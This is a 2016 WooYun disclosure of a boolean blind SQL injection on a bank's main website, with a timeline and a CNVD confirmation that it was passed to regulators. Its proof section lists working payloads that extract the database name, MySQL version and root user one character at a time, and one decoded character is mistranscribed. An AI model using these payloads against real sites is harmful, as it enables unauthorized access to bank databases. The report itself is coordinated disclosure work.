当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0210932

漏洞标题:某银行主站伪静态sql布尔盲注root

相关厂商:fuxinbank.com

漏洞作者: diguoji

提交时间:2016-05-20 18:00

修复时间:2016-07-08 17:40

公开时间:2016-07-08 17:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-20: 细节已通知厂商并且等待厂商处理中
2016-05-24: 厂商已经确认,细节仅向厂商公开
2016-06-03: 细节向核心白帽子及相关领域专家公开
2016-06-13: 细节向普通白帽子公开
2016-06-23: 细节向实习白帽子公开
2016-07-08: 细节向公众公开

简要描述:

520

详细说明:

http://**.**.**.**//cmsDeskArticle/bankCardType/1 注入点
经测试 information_schema不能用,sqlmap神器也悲伤 肯花时间的话 可以猜的出表

1数据库长度.png


2数据库长度.png


漏洞证明:

工具跑不了
1' or length(database())=7 and 1=1 or '1'='
1' or ascii(mid((database()),1,1))=102 and 1=1 or '1'=' f
1' or ascii(mid((database()),2,1))=120 and 1=1 or '1'=' x
1' or ascii(mid((database()),3,1))=45 and 1=1 or '1'=' -
1' or ascii(mid((database()),4,1))=98 and 1=1 or '1'=' b
1' or ascii(mid((database()),5,1))=97 and 1=1 or '1'=' a
1' or ascii(mid((database()),6,1))=110 and 1=1 or '1'=' n
1' or ascii(mid((database()),7,1))=107 and 1=1 or '1'=' k
fx-bank
1' or ascii(mid(version(),1,1))=53 and 1=1 or '1'=' m
1' or ascii(mid(version(),2,1))=46 and 1=1 or '1'=' .
1' or ascii(mid(version(),3,1))=53 and 1=1 or '1'=' 5
1' or ascii(mid(version(),4,1))=46 and 1=1 or '1'=' .
1' or ascii(mid(version(),5,1))=50 and 1=1 or '1'=' 2
1' or ascii(mid(version(),6,1))=49 and 1=1 or '1'=' 1
1' or ascii(mid(version(),7,1))=45 and 1=1 or '1'=' -
1' or ascii(mid(version(),8,1))=108 and 1=1 or '1'=' l
1' or ascii(mid(version(),9,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(version(),10,1))=103 and 1=1 or '1'=' g
m.5.21-log
1' or ascii(mid(user(),1,1))=114 and 1=1 or '1'=' r
1' or ascii(mid(user(),2,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(user(),3,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(user(),4,1))=116 and 1=1 or '1'=' t
1' or ascii(mid(user(),5,1))=64 and 1=1 or '1'=' @
1' or ascii(mid(user(),6,1))=108 and 1=1 or '1'=' l
root@localhost

修复方案:

版权声明:转载请注明来源 diguoji@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-24 17:39

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,并抄报江苏分中心协助处置,由其后续协调网站管理单位处置.

最新状态:

2016-05-24:更新处置状态:CNVD确认所述情况,已经转由CNCERT向银行业信息化主管部门通报,并抄报辽宁分中心协助处置,由其后续协调网站管理单位处置.


漏洞评价:

评价

  1. 2016-05-24 19:17 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg?得失乐与悲与Av Qq205655539)

    QWQ